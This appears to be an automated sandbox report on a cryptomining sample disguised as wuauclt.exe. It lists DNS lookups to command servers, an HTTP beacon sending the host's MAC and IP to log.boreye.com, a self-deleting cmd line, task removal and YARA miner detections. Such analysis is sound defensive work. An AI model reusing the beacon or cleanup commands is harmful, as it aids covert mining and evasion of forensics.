                                              Feb 23, 2022 03:17:52.724116087 CET192.168.2.48.8.8.80x1406Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:54.595674992 CET192.168.2.48.8.8.80x3622Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:54.598393917 CET192.168.2.48.8.8.80x6801Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:54.601253033 CET192.168.2.48.8.8.80xad2dStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:55.744277954 CET192.168.2.48.8.8.80xc32bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:55.784830093 CET192.168.2.48.8.8.80x9829Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:55.787615061 CET192.168.2.48.8.8.80x8406Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:56.753768921 CET192.168.2.48.8.8.80xf6f1Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:56.757359028 CET192.168.2.48.8.8.80xf963Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:56.819638968 CET192.168.2.48.8.8.80xc881Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:57.124361992 CET192.168.2.48.8.8.80x5307Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:57.842695951 CET192.168.2.48.8.8.80x86e2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:57.844325066 CET192.168.2.48.8.8.80x16a8Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:58.385004997 CET192.168.2.48.8.8.80xc2abStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:58.386249065 CET192.168.2.48.8.8.80x2c84Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:58.386892080 CET192.168.2.48.8.8.80xdad4Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:00.141848087 CET192.168.2.48.8.8.80x1b85Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:00.160676956 CET192.168.2.48.8.8.80xb3e6Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:00.163531065 CET192.168.2.48.8.8.80xbdcaStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:03.827583075 CET192.168.2.48.8.8.80x98c2Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:04.099941969 CET192.168.2.48.8.8.80xb3daStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:04.414279938 CET192.168.2.48.8.8.80x6bffStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:05.037002087 CET192.168.2.48.8.8.80xc5f8Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:05.038283110 CET192.168.2.48.8.8.80x42d3Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:05.039335966 CET192.168.2.48.8.8.80xb2f1Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:06.017699957 CET192.168.2.48.8.8.80xbb04Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:06.550318956 CET192.168.2.48.8.8.80x5390Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:06.593893051 CET192.168.2.48.8.8.80xd486Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:07.399161100 CET192.168.2.48.8.8.80x135cStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:07.498773098 CET192.168.2.48.8.8.80xf43bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.242543936 CET192.168.2.48.8.8.80x93d1Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.245345116 CET192.168.2.48.8.8.80x11f6Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.246047020 CET192.168.2.48.8.8.80x5eb0Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.918097973 CET192.168.2.48.8.8.80x9bb9Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.921276093 CET192.168.2.48.8.8.80x14ccStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:10.037482023 CET192.168.2.48.8.8.80x3bddStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.689815044 CET192.168.2.48.8.8.80x6d7bStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.693098068 CET192.168.2.48.8.8.80x2eStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.725672007 CET192.168.2.48.8.8.80x765cStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.748645067 CET192.168.2.48.8.8.80x1d6dStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:12.471340895 CET192.168.2.48.8.8.80x6a2aStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:12.551088095 CET192.168.2.48.8.8.80xd45Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:12.552077055 CET192.168.2.48.8.8.80x954eStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:13.392081976 CET192.168.2.48.8.8.80xd368Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:13.393547058 CET192.168.2.48.8.8.80x713aStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:13.394527912 CET192.168.2.48.8.8.80x3daStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:14.496077061 CET192.168.2.48.8.8.80xcf89Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:14.518726110 CET192.168.2.48.8.8.80xe233Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:14.521399021 CET192.168.2.48.8.8.80x1c4Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:15.163290977 CET192.168.2.48.8.8.80x2595Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:15.164768934 CET192.168.2.48.8.8.80xc67aStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:15.165318966 CET192.168.2.48.8.8.80x36d7Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:17.126071930 CET192.168.2.48.8.8.80x3fe2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:17.194529057 CET192.168.2.48.8.8.80x3084Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:17.195451975 CET192.168.2.48.8.8.80x8adbStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:20.154019117 CET192.168.2.48.8.8.80x52e3Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:22.863518953 CET192.168.2.48.8.8.80xbfc5Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:22.864291906 CET192.168.2.48.8.8.80xc2f0Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:25.210112095 CET192.168.2.48.8.8.80xc5aStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:26.736507893 CET192.168.2.48.8.8.80xe8b2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:26.804306984 CET192.168.2.48.8.8.80xf402Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:26.805155993 CET192.168.2.48.8.8.80x4144Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:28.193944931 CET192.168.2.48.8.8.80x3d3fStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:28.833328009 CET192.168.2.48.8.8.80x42e1Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:28.836766958 CET192.168.2.48.8.8.80xbfd3Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:30.769023895 CET192.168.2.48.8.8.80xa3e0Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:30.772142887 CET192.168.2.48.8.8.80x6bf2Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:32.875988960 CET192.168.2.48.8.8.80x99cdStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:35.259838104 CET192.168.2.48.8.8.80x1a46Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:35.260540009 CET192.168.2.48.8.8.80xb81bStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:35.923979998 CET192.168.2.48.8.8.80x38aeStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:37.243433952 CET192.168.2.48.8.8.80x3f04Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:38.890449047 CET192.168.2.48.8.8.80x9c2dStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:38.893395901 CET192.168.2.48.8.8.80xa768Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:38.894129992 CET192.168.2.48.8.8.80x11c2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:41.081799030 CET192.168.2.48.8.8.80xcfb1Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:43.187747955 CET192.168.2.48.8.8.80xa9e4Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:44.117515087 CET192.168.2.48.8.8.80x6245Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:45.768086910 CET192.168.2.48.8.8.80xa56aStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:47.414551973 CET192.168.2.48.8.8.80x34f5Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:47.516845942 CET192.168.2.48.8.8.80xac0cStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:49.579732895 CET192.168.2.48.8.8.80xbbd4Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:50.236934900 CET192.168.2.48.8.8.80x31d4Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:51.621498108 CET192.168.2.48.8.8.80xad61Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:51.624475956 CET192.168.2.48.8.8.80x24ddStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:51.625406027 CET192.168.2.48.8.8.80x90f1Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:57.742340088 CET192.168.2.48.8.8.80x7c2eStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:58.243387938 CET192.168.2.48.8.8.80xac87Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:58.307921886 CET192.168.2.48.8.8.80xbbbaStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:59.776154995 CET192.168.2.48.8.8.80x6900Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:59.776232958 CET192.168.2.48.8.8.80xbd29Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:59.777285099 CET192.168.2.48.8.8.80xac4eStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:01.945007086 CET192.168.2.48.8.8.80xac68Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:01.946022987 CET192.168.2.48.8.8.80xba45Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:01.946749926 CET192.168.2.48.8.8.80xff3fStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.486354113 CET192.168.2.48.8.8.80xdf5bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.569201946 CET192.168.2.48.8.8.80x3f3bStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.572580099 CET192.168.2.48.8.8.80xda1fStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.732263088 CET192.168.2.48.8.8.80x2528Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:07.665957928 CET192.168.2.48.8.8.80xc239Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:10.112005949 CET192.168.2.48.8.8.80xac5Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:10.112826109 CET192.168.2.48.8.8.80xc0Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:11.486414909 CET192.168.2.48.8.8.80xa293Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:11.488241911 CET192.168.2.48.8.8.80x220eStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:11.488588095 CET192.168.2.48.8.8.80x8800Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Timestamp, Source IP, Dest IP, Trans ID, Reply Code, Name, CName, Address, Type, Class
                                              • log.boreye.com
                                              Session ID:0
                                              Source IP:192.168.2.4
                                              Source Port:49766
                                              Destination IP:72.52.178.23
                                              Destination Port:80
                                              Process:C:\Users\user\Desktop\wuauclt.exe

                                              Timestamp:Feb 23, 2022 03:17:18.386657953 CET
                                              kBytes transferred:1067
                                              Direction:OUT
                                              Data:
                                              GET /ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)
                                              Host: log.boreye.com
                                              Cache-Control: no-cache

                                              Timestamp:Feb 23, 2022 03:17:18.539530993 CET
                                              kBytes transferred:1069
                                              Direction:IN
                                              Data:
                                              HTTP/1.1 200 OK
                                              Date: Wed, 23 Feb 2022 02:17:18 GMT
                                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                              X-Powered-By: PHP/5.4.16
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Ascii: 79c<html><head><script>var forwardingUrl = "/page/bouncy.php?&bpae=GbhOtysGokx79ouoZAyNq%2FOgGyZ9%2FCsEXqGfMQnjJSVsTd%2FhANaPIlHpHul2mBznWBVlLQmch8MhiMJ6Q%2FOp3u9rRcbOcdEZKDDg8S5HIjz7mRVXHDUhG66k6QDIMSp0dcwWg%2BawkbCPzhuvf9zflhX2kocm6xfof%2BU%2Fzx6WPSyWO4K3CZiEz9HY%2Bhi5Zugs%2BwtAfKUT%2Bm1fWoTxdOkGqtT%2BKWzfjrfLIgKkawRtkI6uMB6whcvLzmq6%2FPtHgZPGwBgsupeOxipSQHcx4B4XNZLbAY34tXkL4x958KMa4%2FxyjwUWXPXj0FiinsgnTtX%2FBDS22nJBWasUPeg2ivjbHEvliNh7i4Wdj9FraCt2rBc%2BkHkQXoAZ2iUcu45FXp2QzTKTFzJ6Tzmzyg%3D%3D&redirectType=js";var destinationUrl = "/page/bouncy.php?&bpae=GbhOtysGokx79ouoZAyNq%2FOgGyZ9%2FCsEXqGfMQnjJSVsTd%2FhANaPIlHpHul2mBznWBVlLQmch8MhiMJ6Q%2FOp3u9rRcbOcdEZKDDg8S5HIjz7mRVXHDUhG66k6QDIMSp0dcwWg%2BawkbCPzhuvf9zflhX2kocm6xfof%2BU%2Fzx6WPSyWO4K3CZiEz9HY%2Bhi5Zugs%2BwtAfKUT%2Bm1fWoTxdOkGqtT%2BKWzfjrfLIgKkawRtkI6uMB6whcvLzmq6%2FPtHgZPGwBgsupeOxipSQHcx4B4XNZLbAY34tXkL4x958KMa4%2FxyjwUWXPXj0FiinsgnTtX%2FBDS22nJBWasUPeg2ivjbHEvliNh7i4Wdj9FraCt2rBc%2BkHkQXoAZ2iUcu45FXp2QzTKTFzJ6Tzmzyg%3D%3D&redirectType=meta";var addDetection = true;if (addDetection) {var inIframe = window.self !== w
                                              Feb 23, 2022 03:17:18.539585114 CET1070INData Raw: 69 6e 64 6f 77 2e 74 6f 70 3b 0a 09 09 09 09 66 6f 72 77 61 72 64 69 6e 67 55 72 6c 20 2b 3d 20 22 26 69 6e 49 66 72 61 6d 65 3d 22 20 2b 20 69 6e 49 66 72 61 6d 65 3b 0a 09 09 09 09 76 61 72 20 69 6e 50 6f 70 55 70 20 3d 20 28 77 69 6e 64 6f 77
                                              Data Ascii: indow.top;forwardingUrl += "&inIframe=" + inIframe;var inPopUp = (window.opener !== undefined && window.opener !== null && window.opener !== window);forwardingUrl += "&inPopUp=" + inPopUp;}window.location.replace(forward



                                              Target ID:0
                                              Start time:03:17:07
                                              Start date:23/02/2022
                                              Path:C:\Users\user\Desktop\wuauclt.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\wuauclt.exe"
                                              Imagebase:0x250000
                                              File size:7154917 bytes
                                              MD5 hash:A5CC0738A563489458F6541C3D3DC722
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              Target ID:1
                                              Start time:03:17:07
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:2
                                              Start time:03:17:09
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\svchost.exe -k netsvcs
                                              Imagebase:0x930000
                                              File size:44520 bytes
                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000002.00000002.968926651.000000000309D000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000002.00000002.968774833.0000000003012000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              Reputation:high

                                              Target ID:8
                                              Start time:03:17:18
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline: /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"
                                              Imagebase:0x230000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:9
                                              Start time:03:17:18
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:10
                                              Start time:03:17:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:11
                                              Start time:03:17:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline: /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /F
                                              Imagebase:0x230000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:12
                                              Start time:03:17:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:13
                                              Start time:03:17:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\PING.EXE
                                              Wow64 process (32bit):true
                                              Commandline:ping 127.0.0.1 -n 5
                                              Imagebase:0xe30000
                                              File size:18944 bytes
                                              MD5 hash:70C24A306F768936563ABDADB9CA9108
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:14
                                              Start time:03:17:20
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:15
                                              Start time:03:17:21
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\ctfmon.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\ctfmon.exe
                                              Imagebase:0x11c0000
                                              File size:9728 bytes
                                              MD5 hash:12764C4EC54842D1790BD8FA91033268
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Target ID:16
                                              Start time:03:17:25
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\dllhostex.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\dllhostex.exe
                                              Imagebase:0x1290000
                                              File size:1360384 bytes
                                              MD5 hash:D0C6EDC58729D88970CB9EE8A456457C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000000.695613920.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000000.696093152.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000000.696628096.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000000.695093675.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000000.695093675.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000000.696044384.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000000.696044384.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000000.695147785.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000000.696614695.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000000.696614695.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 54%, Metadefender
                                              • Detection: 90%, ReversingLabs
                                              Reputation:low

                                              Target ID:17
                                              Start time:03:17:25
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
